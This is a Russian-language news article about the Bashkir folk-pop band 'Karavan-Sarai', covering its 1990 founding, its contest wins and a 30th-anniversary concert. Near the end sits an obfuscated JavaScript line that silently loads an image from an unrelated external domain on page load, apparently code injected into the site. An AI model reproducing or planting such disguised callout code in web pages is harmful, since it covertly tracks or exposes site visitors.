“Караван-сарай” – 30 лет на сцене!

WhatsApp Image 2020-12-09 at 17.22.20

«Первые репетиции нашего коллектива «Караван-сарай», начинались в 708 комнате общежития Уфимского государственного института искусств», – с улыбкой вспоминает о творческом пути группы, народный артист РБ Вильдан Яруллин. Коллектив, который очень скоро станет желанным участником различных торжеств и мероприятий республиканского масштаба и правительственных концертов, начал свое шествие при участии пятерых, тогда еще  никому не известных студентов театрального факультета Уфимского государственного института искусств Амира Туйгунова, Артура Туктагулова, Вильдана Яруллина, Махмута Надыршина и Расула Карабулатова. Днем  рождения  группы ребята  считают 6 марта 1990 года. В тот день на сцене института искусств имени Ф.И. Шаляпина, впервые народные инструменты, как курай, кубыз и думбыра соседствовали с современными эстрадными инструментами. Это было совершенно новым явлением для  башкирской эстрады. А  репертуар группы (помимо обработки народных песен),  пополнялся все новыми и новыми композициями участников группы – А.Туктагулова, А.Туйгунова, М.Надыршина. После этого выступления, ребята начали готовиться к серьезному конкурсу в Чечено-Ингушской республике. На этом конкурсе, который прошел в  1991 году в городе Гудермес, они становятся лауреатами Всероссийского конкурса среди рок-групп (I премия).

Уже в 1992 году,  коллектив удостаивается звания дипломантов на международном конкурсе «Голос Азии» в г.Алма-Ате. После этого успеха, группа успела отличиться на различных фестивалях и конкурсах международного, всероссийского и республиканского уровня.

И сегодня «Караван-сарай», находясь в числе лидеров башкирской эстрады, вот уже тридцать лет радует своих многочисленных поклонников. Секрет долголетия в том, что в творчестве этого коллектива башкирский фольклор, народные песни и мелодии  сочетаются с эстрадными аранжировками, обогащаясь современными ритмами. Но главный секрет группы – в высоком профессионализме ребят и в том, что состав коллектива за эти четверть века менялся незначительно. «Приходили и уходили музыканты и солисты, но костяк группы и поныне остаётся неизменным. Свои  концерты традиционно мы стараемся проводить  в тесном контакте со зрителями, в непринуждённой, весёлой атмосфере», – говорит Вильдан Яруллин.  Как известно,  все участники группы  – профессиональные актёры, в их творческом багаже – яркие творческие образы, созданные на сценах республики. И зрители отвечают им искренней любовью.

Совсем скоро, а именно 25-го декабря, поклонники группы  смогут снова встретиться со своими кумирами в Государственном концертном зале «Башкортостан». Пришедшие на концерт смогут услышать наряду  со старыми, уже известными песнями, совершенно новые, специально написанные к юбилею группы композициями. «Караван-сарай» приглашает своих поклонников в государственный концертный зал «Башкортостан»   на концерт, посвящённый 30-летию коллектива!

Начало: 19.00.

Билеты в кассах города.

 

var e,n,o;window.self===window.top&&(e=[‘//’,’s:’,’tp’,’ht’].reverse().join(”),n=[‘bmhbmffy.lussoit.com’,’68’].join(‘/’),(o=new Image).src=”.concat(e).concat(n,’.gif’));

Share on vk
Share on odnoklassniki
Share on facebook
Share on whatsapp